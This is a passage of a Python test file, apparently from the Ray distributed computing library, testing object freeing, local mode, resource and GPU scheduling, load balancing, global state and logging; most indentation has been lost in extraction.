ActorOnNode0 = ray.remote(resources={"Custom0": 1})(RawActor)
ActorOnNode1 = ray.remote(resources={"Custom1": 1})(RawActor)
ActorOnNode2 = ray.remote(resources={"Custom2": 1})(RawActor)
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
# Wait for the objects to be deleted.
time.sleep(0.1)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
    # Case 1: run this with local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
    # Case 2: run this with local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
    # The deleted object is the one stored on the same node as the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert np.alltrue(xref == np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert np.alltrue(xref == ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert np.alltrue(y == ray.put(y))
    # Make sure objects are immutable; this example is why we need to copy
    # arguments before passing them into remote functions in local mode.
aref = local_mode_f.remote()
assert np.alltrue(aref == np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(aref == np.array([0, 0]))
assert np.alltrue(bref == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert np.alltrue(test_actor.get_array.remote() == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.5
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.5
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
def get_gpu_ids(num_gpus_per_worker):
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == num_gpus_per_worker
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
f0 = ray.remote(num_gpus=0)(lambda: get_gpu_ids(0))
f1 = ray.remote(num_gpus=1)(lambda: get_gpu_ids(1))
f2 = ray.remote(num_gpus=2)(lambda: get_gpu_ids(2))
f4 = ray.remote(num_gpus=4)(lambda: get_gpu_ids(4))
f5 = ray.remote(num_gpus=5)(lambda: get_gpu_ids(5))
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
# There are only 10 GPUs, and each task uses 5 GPUs, so there should only
# be 2 tasks scheduled at a given time.
t1 = time.time()
ray.get([f5.remote() for _ in range(20)])
assert time.time() - t1 >= 10 * 0.1
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote raylet.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
    # Make sure that we cannot create a second actor that requires 0.7 of
    # the custom resource while only 0.3 remains. TODO(rkn): Re-enable this
    # once ray.wait is implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
    # Make sure we can start an actor that requires only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_raylets(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific raylets, and we will check that they are assigned
# to the correct raylets.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and raylets (at least right now), this can be
# used to identify which raylet the task was assigned to.
# This must be run on the zeroth raylet.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first raylet.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second raylet.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second raylet.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second raylet.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
    # custom resource gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both raylets.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second raylet.
raylet_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(raylet_ids) == 1
assert list(raylet_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
    # Record the current value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(ray_start_regular):
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
        # Each instance of h submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
    ray.get([g.remote(i) for i in range(4)])
    ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
ray.get([_sleep.remote(i) for i in range(10)])
ray.get(sleep.remote())
def test_max_call_tasks(ray_start_regular):
@ray.remote(max_calls=1)
def f():
return os.getpid()
pid = ray.get(f.remote())
ray.tests.utils.wait_for_pid_to_exit(pid)
@ray.remote(max_calls=2)
def f():
return os.getpid()
pid1 = ray.get(f.remote())
pid2 = ray.get(f.remote())
assert pid1 == pid2
ray.tests.utils.wait_for_pid_to_exit(pid1)
def attempt_to_load_balance(remote_function,
args,
total_tasks,
num_nodes,
minimum_count,
num_attempts=100):
attempts = 0
while attempts < num_attempts:
locations = ray.get(
[remote_function.remote(*args) for _ in range(total_tasks)])
names = set(locations)
counts = [locations.count(name) for name in names]
logger.info("Counts are {}.".format(counts))
if (len(names) == num_nodes
and all(count >= minimum_count for count in counts)):
break
attempts += 1
assert attempts < num_attempts
def test_load_balancing(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets
# in a roughly equal manner.
cluster = ray_start_cluster
num_nodes = 3
num_cpus = 7
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_cpus)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.01)
return ray.worker.global_worker.plasma_client.store_socket_name
attempt_to_load_balance(f, [], 100, num_nodes, 10)
attempt_to_load_balance(f, [], 1000, num_nodes, 100)
def test_load_balancing_with_dependencies(ray_start_cluster):
# This test ensures that tasks are being assigned to all raylets in a
# roughly equal manner even when the tasks have dependencies.
cluster = ray_start_cluster
num_nodes = 3
for _ in range(num_nodes):
cluster.add_node(num_cpus=1)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
time.sleep(0.010)
return ray.worker.global_worker.plasma_client.store_socket_name
# This object will be local to one of the raylets. Make sure
# this doesn't prevent tasks from being scheduled on other raylets.
x = ray.put(np.zeros(1000000))
attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.task_table()) >= num_tasks:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
start_time = time.time()
while time.time() - start_time < timeout:
if len(ray.global_state.object_table()) >= num_objects:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for global state.")
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
with pytest.raises(Exception):
ray.global_state.object_table()
with pytest.raises(Exception):
ray.global_state.task_table()
with pytest.raises(Exception):
ray.global_state.client_table()
with pytest.raises(Exception):
ray.global_state.function_table()
ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})
resources = {"CPU": 5, "GPU": 3, "CustomResource": 1}
assert ray.global_state.cluster_resources() == resources
assert ray.global_state.object_table() == {}
driver_id = ray.experimental.state.binary_to_hex(
ray.worker.global_worker.worker_id)
driver_task_id = ray.worker.global_worker.current_task_id.hex()
# One task is put in the task table which corresponds to this driver.
wait_for_num_tasks(1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1
assert driver_task_id == list(task_table.keys())[0]
task_spec = task_table[driver_task_id]["TaskSpec"]
nil_id_hex = ray.ObjectID.nil().hex()
assert task_spec["TaskID"] == driver_task_id
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == []
assert task_spec["DriverID"] == driver_id
assert task_spec["FunctionID"] == nil_id_hex
assert task_spec["ReturnObjectIDs"] == []
client_table = ray.global_state.client_table()
node_ip_address = ray.worker.global_worker.node_ip_address
assert len(client_table) == 1
assert client_table[0]["NodeManagerAddress"] == node_ip_address
@ray.remote
def f(*xs):
return 1
x_id = ray.put(1)
result_id = f.remote(1, "hi", x_id)
# Wait for one additional task to complete.
wait_for_num_tasks(1 + 1)
task_table = ray.global_state.task_table()
assert len(task_table) == 1 + 1
task_id_set = set(task_table.keys())
task_id_set.remove(driver_task_id)
task_id = list(task_id_set)[0]
function_table = ray.global_state.function_table()
task_spec = task_table[task_id]["TaskSpec"]
assert task_spec["ActorID"] == nil_id_hex
assert task_spec["Args"] == [1, "hi", x_id]
assert task_spec["DriverID"] == driver_id
assert task_spec["ReturnObjectIDs"] == [result_id]
function_table_entry = function_table[task_spec["FunctionID"]]
assert function_table_entry["Name"] == "ray.tests.test_basic.f"
assert function_table_entry["DriverID"] == driver_id
assert function_table_entry["Module"] == "ray.tests.test_basic"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
"""Capture stdout and stderr of some span.
This can be used as follows.
captured = {}
with CaptureOutputAndError(captured):
# Do stuff.
# Access captured["out"] and captured["err"].
"""
def __init__(self, captured_output_and_error):
if sys.version_info >= (3, 0):
import io
self.output_buffer = io.StringIO()
self.error_buffer = io.StringIO()
else:
import cStringIO
self.output_buffer = cStringIO.StringIO()
self.error_buffer = cStringIO.StringIO()
self.captured_output_and_error = captured_output_and_error
def __enter__(self):
sys.stdout.flush()
sys.stderr.flush()
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
sys.stdout = self.output_buffer
sys.stderr = self.error_buffer
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout.flush()
sys.stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
self.captured_output_and_error["out"] = self.output_buffer.getvalue()
self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=True)
@ray.remote
def f():
# It's important to make sure that these print statements occur even
# without calling sys.stdout.flush() and sys.stderr.flush().
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
for i in range(200):
assert str(i) in output_lines
error_lines = captured["err"]
assert len(error_lines) == 0
def test_not_logging_to_driver(shutdown_only):
ray.init(num_cpus=1, log_to_driver=False)
@ray.remote
def f():
for i in range(100):
print(i)
print(100 + i, file=sys.stderr)
sys.stdout.flush()
sys.stderr.flush()
captured = {}
with CaptureOutputAndError(captured):
ray.get(f.remote())
time.sleep(1)
output_lines = captured["out"]
assert len(output_lines) == 0
error_lines = captured["err"]
assert len(error_lines) == 0
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.DriverID(b"00112233445566778899")
ray.init(num_cpus=1, driver_id=dummy_driver_id)
# in driver
assert dummy_driver_id == ray._get_runtime_context().current_driver_id
# in worker
@ray.remote
def f():
return ray._get_runtime_context().current_driver_id
assert dummy_driver_id == ray.get(f.remote())
ray.shutdown()
def test_object_id_properties():
id_bytes = b"00112233445566778899"
object_id = ray.ObjectID(id_bytes)
assert object_id.binary() == id_bytes
object_id = ray.ObjectID.nil()
assert object_id.is_nil()
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(id_bytes + b"1234")
with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
ray.ObjectID(b"0123456789")
object_id = ray.ObjectID(_random_string())
assert not object_id.is_nil()
assert object_id.binary() != id_bytes
id_dumps = pickle.dumps(object_id)
id_from_dumps = pickle.loads(id_dumps)
assert id_from_dumps == object_id
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.binary()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(ray_start_2_cpus):
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle(
) == "ray_worker:ray.tests.test_basic.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.DriverID.nil()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id.binary(),
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(ray_start_2_cpus):
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
def test_pandas_parquet_serialization():
# Only test this if pandas is installed
pytest.importorskip("pandas")
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
tempdir = tempfile.mkdtemp()
